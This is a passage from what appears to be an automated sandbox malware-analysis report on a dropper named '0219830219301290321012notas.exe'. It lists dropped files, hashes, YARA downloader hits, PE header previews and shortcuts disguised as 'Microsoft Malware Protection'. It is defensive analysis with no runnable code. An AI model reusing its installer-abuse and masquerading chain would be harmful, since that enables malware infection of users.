                                                                  SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\ContentPack\Update.exe, Author: Joe Security
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*

                                                                  C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):22216
                                                                  Entropy (8bit):6.866938252411722
                                                                  Encrypted:false
                                                                  SSDEEP:384:fC8JWIqWCL7oJ0GftpBjpdanCZkscHRN7js7ll7PCDG/7:VFQo6in8CCs4j877
                                                                  MD5:CC09BB7FDEFC5763CCB3CF7DAE2D76CF
                                                                  SHA1:8610D07F27A961066134D728C82EB8E5F22E7E8F
                                                                  SHA-256:F8F00900EDBA2F64BF136DD0B6C83CAF07C72F24F3D49C78B7EA24757FDBC6D0
                                                                  SHA-512:0C518487AA5BAD357BD19AD09C6CFE0B8BB522D74A916D36CF01F1BD194B59CD8457784B199DC953570AD7EF8CE67464D066BDA51E31B055C9D4D5CA060D45C5
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a:[.%[5.%[5.%[5.... [5.%[4.)[5.... [5....$[5....$[5....$[5.Rich%[5.........................PE..L...(.AU..................................... ....@..........................`......e............`..........................(0..<....@...................@...P..0...................................H...@............0..$............................text............................... ..`.data...$.... ......................@....idata..0....0......................@..@.rsrc........@......................@..@.reloc..0....P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\ContentPack\app-1.0.0\MpSvc.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2695680
                                                                  Entropy (8bit):6.633366289954333
                                                                  Encrypted:false
                                                                  SSDEEP:24576:fx7mODrQkzw50Ri82xXPIBa3dNcH4Jd2J7zJdB1SKW/V9YXFp+59MxFYz3sjD8T0:fEcz2x7UDd/SKKApKMxFYzXTw7
                                                                  MD5:86E884477A0160A0915DA06649371E5F
                                                                  SHA1:1C6EA93F1288891A2552982D69A8343189DE80B7
                                                                  SHA-256:EE471A3847795729BD73D097D74ABA45400A291DD4DA08A9E3C77052AAC08884
                                                                  SHA-512:7A38792EFE388ED7B1CA53F6960758D7DEB99AD0D4D08C12F3BA0E68D8CD902624B1A1EEFE31073F8A86FB56CA3122EE15F405B99B99EDC68B2814952FCCC724
                                                                  Malicious:true
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...B..e.................D$.........PX$......`$...@...........................).......................................%......`%..=... ).......................%..A..................................................lk%.x.....%......................text....)$......*$................. ..`.itext..h....@$.......$............. ..`.data...d....`$......H$.............@....bss.....g....$..........................idata...=...`%..>....$.............@....didata.......%.......%.............@....edata........%...... %.............@..@.rdata..D.....%......"%.............@..@.reloc...A....%..B...$%.............@..B.rsrc........ )......f(.............@..@..............)......").............@..@........................................................

                                                                  C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):80800
                                                                  Entropy (8bit):6.781496286846518
                                                                  Encrypted:false
                                                                  SSDEEP:1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
                                                                  MD5:1E6E97D60D411A2DEE8964D3D05ADB15
                                                                  SHA1:0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
                                                                  SHA-256:8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
                                                                  SHA-512:3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.Dq..*"..*"..*"..+#..*".."..*"..+"4.*"}.)#..*"}..#..*"}./#..*"}.*#..*"}.."..*"}.(#..*"Rich..*"........................PE..L...7.O.........."!... .....................................................P............@A........................0........ .......0...................'...@.......$..T............................#..@............ ...............................text...D........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\ContentPack\packages\ContentPack-1.0.0-full.nupkg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):1204336
                                                                  Entropy (8bit):7.998442627142358
                                                                  Encrypted:true
                                                                  SSDEEP:24576:CWQzq+aGgkz0SrQy75OYpk7LmMHseMOWsxam8p4/HND7mxcKizFWyT9IdgPSFBC:CJ9zey75OYpk7nMeMOBGulqCJ9I+PSFQ
                                                                  MD5:7BDBDE71A61EE412CB77156199EEDC46
                                                                  SHA1:652938A112187AEE90FAD5C30C9D7575C3783552
                                                                  SHA-256:BC4D61BE88A05E537CCB5E85B6517A73B7C7A191F18AA6B815E7349129568F09
                                                                  SHA-512:DD9F580D439EEDAE81C24A78EDF5B5A831D60CF6FFFE3BD10209F889CCA2F78916682450D7B089D56C6C6D762278F0384310DB2CA4040EDD37E33D8A0C31AE68
                                                                  Malicious:false
                                                                  Preview:PK.........PWXt.f.............ContentPack.nuspecu.MN.0...H...L.!.....e..,g.X.?x&...3.@.B\..uJ....7OO..O...I.b$.]Sl......b......2(......)F.p.@zD...FGO..R{.GoJ....P..)..w..)L.i.U.X.(.......?.e.......ZYI..lx...a..j..GZ;.p..7...k..2...F.#....+....D(.?}..t4.S.u.3a..l...S.?.}.G3....K|..QW....z<0.]XB....PK.........PWX................lib/PK.........PWX................lib/net48/PK.........PWX...../...V......lib/net48/BumpFiles.exe...@...ni.9J...8P:.[0..8J..H..D.,T...E.TQ@ZA...1(..$...}w......u.~.3;.;.;;.;......... .........t .....S.:'...]..j..a.....".z...HwB@@ ..FD.B..>.H.+;....Q...Uz....8.m*._.r..^$=...@..m..{........7-......1.2@...n..7...eg..@`..n..|..$...8-....?........">.%.5...G.L........d.r..,+.. .......@..f..3}m....3I..z%21..~...........].@&.qi8..L...f..:%.%B.J.{.....t.H.$w...K...=.LG...... -...Gtz....h..}&...os..Y..\n.A..r. .}@ .K.4......N<....]...F_.1.B..WJ..sibh.l.d........ax.........Ua[..q...|.P.=.......q.}.Y.>.<$.....W:U....7Cl...[......2.......~.g.A4-.

                                                                  C:\Users\user\AppData\Local\ContentPack\packages\RELEASES

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):80
                                                                  Entropy (8bit):4.821762239033052
                                                                  Encrypted:false
                                                                  SSDEEP:3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
                                                                  MD5:2974BFB739B24B645F7958ABA97741C4
                                                                  SHA1:7C874B7A39F81575653A4C11897DE01A7735406A
                                                                  SHA-256:3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
                                                                  SHA-512:6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
                                                                  Malicious:false
                                                                  Preview:.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336

                                                                  C:\Users\user\AppData\Local\ContentPack\packages\SquirrelTemp\tempa

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):80
                                                                  Entropy (8bit):4.821762239033052
                                                                  Encrypted:false
                                                                  SSDEEP:3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
                                                                  MD5:2974BFB739B24B645F7958ABA97741C4
                                                                  SHA1:7C874B7A39F81575653A4C11897DE01A7735406A
                                                                  SHA-256:3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
                                                                  SHA-512:6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
                                                                  Malicious:false
                                                                  Preview:.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2751
                                                                  Entropy (8bit):5.372322730968244
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
                                                                  MD5:E186D8CCFA77C108F5C38908EF87820C
                                                                  SHA1:47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
                                                                  SHA-256:E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
                                                                  SHA-512:4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\webTc[1].zip

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8764801
                                                                  Entropy (8bit):7.999974027044619
                                                                  Encrypted:true
                                                                  SSDEEP:196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6oF+nzPZp:HeZ4N80jwG3W2xR2YP6MX43
                                                                  MD5:88EC493F2A48D234120348AEAB6D3808
                                                                  SHA1:3FB458578198B4691B409FFEABB99EDFE3827EAD
                                                                  SHA-256:4086FF865F27274805EEB8DF9504D381AF17582632FFFD02C81245A3119A3F34
                                                                  SHA-512:9A8CF59D76CBDEB0B03525A1D3E2869688F597F2A10751E13815CB827D92F12A7FCFAB0A32932A55386BE3026124BE9CA51FC2DF6A112D3B2E00141BEBA6F5F9
                                                                  Malicious:false
                                                                  Preview:H~.Ea..kyJ._.....@....<.=..}.]..A.).W.....".gb...s...lR..4p..ekJ.......n...q.~.P......(J!...v.Ma>.<.+(.r.>...F..g8..k e...Rb..S....w...^.,.`...T.9`zC...?.37..._.Y&!..L.I..H.q..3{S.H........D.v1k.[.^n..-.....J....W.c.#y.G,.U....(V..e..EM...-!f...\.}..}.[.."......z...B.q..'c".o......._...T....~.....D.d......J......9w..b.Kik..H..fSQ........&.`.'.......92:....i...~...^...Q.mQ.;pt...."....r]..).mv...q3....H.I./.v..G.....e.4.z"...UsSn...D...I....S.A:.....|.x...*).b..7){.i0.L.r}V6.....3...._.8..XY~.;..~%....:uc.y".7...%.ip..p.....Li..wh...j._..R:.....4..9......`.._.`....PYC..k1....._$..(a..N..A...\..<./.....E..-...dM........i..y..G3!....0q..C*.cm.R&W?.E@.........V..79.Mf........@.G......"#.....$.......g.b.8...tYQZ...d...~>.?.4.v.O........%.?l...R*.!.\....N..`..(..M....h.7TcQ..1.?`.3.|..sX(;....y`..cd..K.....B..|...X.8.......6q.`.....J...2P./G.<...^}....S.'.......J#.....q.k]Zg%..+.@.'[...cE7....g......2w<.J....1s]##....n..!.U..#.. ..6"

                                                                  C:\Users\user\AppData\Local\SquirrelTemp\ContentPack-1.0.0-full.nupkg

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):1204336
                                                                  Entropy (8bit):7.998442627142358
                                                                  Encrypted:true
                                                                  SSDEEP:24576:CWQzq+aGgkz0SrQy75OYpk7LmMHseMOWsxam8p4/HND7mxcKizFWyT9IdgPSFBC:CJ9zey75OYpk7nMeMOBGulqCJ9I+PSFQ
                                                                  MD5:7BDBDE71A61EE412CB77156199EEDC46
                                                                  SHA1:652938A112187AEE90FAD5C30C9D7575C3783552
                                                                  SHA-256:BC4D61BE88A05E537CCB5E85B6517A73B7C7A191F18AA6B815E7349129568F09
                                                                  SHA-512:DD9F580D439EEDAE81C24A78EDF5B5A831D60CF6FFFE3BD10209F889CCA2F78916682450D7B089D56C6C6D762278F0384310DB2CA4040EDD37E33D8A0C31AE68
                                                                  Malicious:false
                                                                  Preview:PK.........PWXt.f.............ContentPack.nuspecu.MN.0...H...L.!.....e..,g.X.?x&...3.@.B\..uJ....7OO..O...I.b$.]Sl......b......2(......)F.p.@zD...FGO..R{.GoJ....P..)..w..)L.i.U.X.(.......?.e.......ZYI..lx...a..j..GZ;.p..7...k..2...F.#....+....D(.?}..t4.S.u.3a..l...S.?.}.G3....K|..QW....z<0.]XB....PK.........PWX................lib/PK.........PWX................lib/net48/PK.........PWX...../...V......lib/net48/BumpFiles.exe...@...ni.9J...8P:.[0..8J..H..D.,T...E.TQ@ZA...1(..$...}w......u.~.3;.;.;;.;......... .........t .....S.:'...]..j..a.....".z...HwB@@ ..FD.B..>.H.+;....Q...Uz....8.m*._.r..^$=...@..m..{........7-......1.2@...n..7...eg..@`..n..|..$...8-....?........">.%.5...G.L........d.r..,+.. .......@..f..3}m....3I..z%21..~...........].@&.qi8..L...f..:%.%B.J.{.....t.H.$w...K...=.LG...... -...Gtz....h..}&...os..Y..\n.A..r. .}@ .K.4......N<....]...F_.1.B..WJ..sibh.l.d........ax.........Ua[..q...|.P.=.......q.}.Y.>.<$.....W:U....7Cl...[......2.......~.g.A4-.

                                                                  C:\Users\user\AppData\Local\SquirrelTemp\RELEASES

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):80
                                                                  Entropy (8bit):4.821762239033052
                                                                  Encrypted:false
                                                                  SSDEEP:3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
                                                                  MD5:2974BFB739B24B645F7958ABA97741C4
                                                                  SHA1:7C874B7A39F81575653A4C11897DE01A7735406A
                                                                  SHA-256:3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
                                                                  SHA-512:6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
                                                                  Malicious:false
                                                                  Preview:.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336

                                                                  C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (387), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2567
                                                                  Entropy (8bit):5.300453422370994
                                                                  Encrypted:false
                                                                  SSDEEP:48:2/tH+s73fLC9eeJXbIv4CBXOuqDZlBTuqDZp14jZ6WEBXAglBRgp14jZ6WEB1+BG:2lM9I53qDZlwqDZofE5AglHgofEm+4Ha
                                                                  MD5:3A527C7F08A96BC349DDD4042D918918
                                                                  SHA1:A2A9653D02238F496C1B241EC347241139EA2F08
                                                                  SHA-256:31DF199DEFA28F16CEF151B935874F2B3156D098FBBD5D0860B912EC4AF6046E
                                                                  SHA-512:8D4DC8D478766C4823DC679199F44D8EA87C23DA4A4F8F2905AF42B3C0FEE99BC084A6FA50E34BA6611FE974D94CC76FA4335A958717E2B350BF209B15F23A0B
                                                                  Malicious:false
                                                                  Preview:.[23/02/24 15:43:18] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[23/02/24 15:43:18] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[23/02/24 15:43:18] info: Program: About to install to: C:\Users\user\AppData\Local\ContentPack..[23/02/24 15:43:18] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[23/02/24 15:43:18] info: CheckForUpdateImpl: First run, starting from scratch..[23/02/24 15:43:18] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\ContentPack\app-1.0.0..[23/02/24 15:43:18] info: LogHost: Rigging execution stub for BumpFiles_ExecutionStub.exe to C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe..[23/02/24 15:43:18] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[23/02/24 15:43:18] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[23/02/24 15:43:18] info: ApplyRelease

                                                                  C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1899520
                                                                  Entropy (8bit):5.894883178349122
                                                                  Encrypted:false
                                                                  SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                                  MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                                  SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                                  SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                                  SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*

                                                                  C:\Users\user\AppData\Local\Temp\.squirrel-lock-68A44D3AD842D31101CEB3665791DCFE494869E5

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:ISO-8859 text, with CR line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):2.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:9:9
                                                                  MD5:A7E0F8AC46398A7876D1E40DD52C2AAB
                                                                  SHA1:B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
                                                                  SHA-256:05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
                                                                  SHA-512:E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
                                                                  Malicious:false
                                                                  Preview:....

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\bin01.zip (copy)

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):142
                                                                  Entropy (8bit):6.55447018279355
                                                                  Encrypted:false
                                                                  SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                                  MD5:57A37BD0840D0745A9481BCC25B5A792
                                                                  SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                                  SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                                  SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                                  Malicious:false
                                                                  Preview:H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation\Microsoft Malware Protection.lnk

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Feb 23 13:43:18 2024, mtime=Fri Feb 23 13:43:18 2024, atime=Fri Feb 23 13:43:18 2024, length=196096, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2278
                                                                  Entropy (8bit):3.766245034155764
                                                                  Encrypted:false
                                                                  SSDEEP:48:8dCaQLWFRsBFqxBtrBuorBBrBubZlqrBuYxSyA7EL/B2:8ovWrsB4BpBtBdB7B3xSyAgDB
                                                                  MD5:0E239E34C776893E2C82B9930B15A542
                                                                  SHA1:614CE5CA51D45E9FCFD517EFAE1D30C74D03C10B
                                                                  SHA-256:448006D188D9D4A49E5D3B0C9F6843FB1A67C2FEC92377DD1E3443693880583D
                                                                  SHA-512:BD40DD2D188ACF1AF412DC189A9526E090E685C0578EA4CE04761F0EBEAF71586D759F8654FAB2A3E8289F7689D204159DA59D4BA646F1DF3B8CE5B9A88C7B5D
                                                                  Malicious:false
                                                                  Preview:L..................F.@.. .......ff......ff......ff............................:..DG..Yr?.D..U..k0.&...&...... M........ff..:.X.ff......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlWXhu....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....WXju..Local.<......DWSlWXju....V.........................L.o.c.a.l.....`.1.....WXju..CONTEN~1..H......WXjuWXju.... .....................%P..C.o.n.t.e.n.t.P.a.c.k.....h.2.....WXju .BUMPFI~1.EXE..L......WXjuWXju....*........................B.u.m.p.F.i.l.e.s...e.x.e.......f...............-.......e...........-t.......C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe....C.o.n.t.e.n.t.P.a.c.k.1.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.B.u.m.p.F.i.l.e.s...e.x.e.3.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.a.p.p.-.1...0...0.7.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.B.u.m.p.F.i.l.e.s...e.x.e.........%U

                                                                  C:\Users\user\Desktop\Microsoft Malware Protection.lnk

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Feb 23 13:43:18 2024, mtime=Fri Feb 23 13:43:19 2024, atime=Fri Feb 23 13:43:18 2024, length=196096, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2264
                                                                  Entropy (8bit):3.7757939614943954
                                                                  Encrypted:false
                                                                  SSDEEP:48:8DiCaQLWFR7BFqxBnrBuorBBrBubZlqrBuYxSyA7EL/B2:87vWr7B4BrBtBdB7B3xSyAgDB
                                                                  MD5:4AFBABFD2DFA85D75B20AC1A53359F7A
                                                                  SHA1:6AFD09168B42557CB68CAEE3CF8B5ABAD2F379FC
                                                                  SHA-256:46A4A84C328C01D4C1924F333723E8889586801F5DD19185887A91500D052605
                                                                  SHA-512:80921594B2CB33BB9F66831F25C44C4EA4DF2864F49D1C3B63857F2DAB0DF54A54B657A02ADF7E4F459A8623E17C245B5CAD1F7C8348DB04AE7266BBEE34597B
                                                                  Malicious:false
                                                                  Preview:L..................F.@.. .......ff....u.ff......ff............................:..DG..Yr?.D..U..k0.&...&...... M........ff..:.X.ff......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlWXhu....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....WXju..Local.<......DWSlWXju....V.........................L.o.c.a.l.....`.1.....WXju..CONTEN~1..H......WXjuWXju.... ........................C.o.n.t.e.n.t.P.a.c.k.....h.2.....WXju .BUMPFI~1.EXE..L......WXjuWXju....*........................B.u.m.p.F.i.l.e.s...e.x.e.......f...............-.......e...........-t.......C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe....C.o.n.t.e.n.t.P.a.c.k.*.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.B.u.m.p.F.i.l.e.s...e.x.e.3.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.a.p.p.-.1...0...0.7.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.n.t.e.n.t.P.a.c.k.\.B.u.m.p.F.i.l.e.s...e.x.e.........%USERPROFILE%\Ap

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.963237042378313
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:0219830219301290321012notas.exe
                                                                  File size:2'102'272 bytes
                                                                  MD5:a548469585481a1b7f98c9b09d271349
                                                                  SHA1:677eabeb661d965c7d3d5ff6f6b9336e27b80b91
                                                                  SHA256:21340c04b12af92f3bd3dd076e5a4f20c0fe5558461b5ff3f848e5d5b7183322
